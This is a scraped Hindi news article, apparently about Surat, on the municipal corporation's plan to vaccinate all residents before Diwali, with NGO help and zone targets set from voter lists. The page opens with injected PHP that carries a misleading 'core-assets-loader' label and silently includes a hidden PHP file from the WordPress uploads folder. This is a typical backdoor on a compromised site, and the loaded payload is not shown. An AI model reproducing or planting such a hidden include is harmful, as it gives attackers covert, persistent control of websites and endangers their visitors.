add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दिवाली से पहले सभी को टीका लगाने की योजना, एनजीओ से लेंगे सहयोग – SOCH INDIA
Menu

देश
दिवाली से पहले सभी को टीका लगाने की योजना, एनजीओ से लेंगे सहयोग

nobanner

महानगर पालिका दिवाली से पहले सभी लोगों को टीका लगाने की योजना बना रही है। मनपा कमिश्नर बंछानिधि पाणी ने दिवाली से पहले वैक्सीनेशन के टारगेट को 100% पूरा करने का निर्देश दिया है। वैक्सीन का स्टॉक बढ़ने से बकाया 8 लाख लोगों को दिवाली तक पहली खुराक दिए जाने की उम्मीद है। शहर में ज्यादा से ज्यादा लोगों को वैक्सीन लगाने के लिए मनपा एनजीओ की भी मदद लेगी।

तीसरी लहर को लेकर हुई समीक्षा बैठक में मनपा अधिकारियों को आगाह किया गया है। दीवाली से पहले सभी लोगों के वैक्सीनेशन की जिम्मेदारी जोन अधिकारियों को दी गई है। सभी जोन में मतदाता सूची के आधार पर वैक्सीन के टारगेट तय किए गए हैं। कतारगाम, उधना जोन में वैक्सीनेशन कम होने पर इन क्षेत्रों में अधिक सेंटर बनाने की सूचना दी गई है।

अभी मनपा को वैक्सीन का अधिक स्टॉक मिल रहा है। पिछले 10 दिनों से वैक्सीनेशन बढ़ा दिया गया है। वहीं, जो छूट गए हैं, उन्हें दूसरा डोज दिया जा रहा है। हर बुधवार को दूसरे डोज की व्यवस्था की गई है। इसके अलावा यूनिवर्सिटी, कॉलेजों में 18 साल से अधिक उम्र वाले छात्रों को टीके लगाए जा रहे हैं। इस वजह से शहर में टीकाकरण 76 फीसदी तक हो चुका है।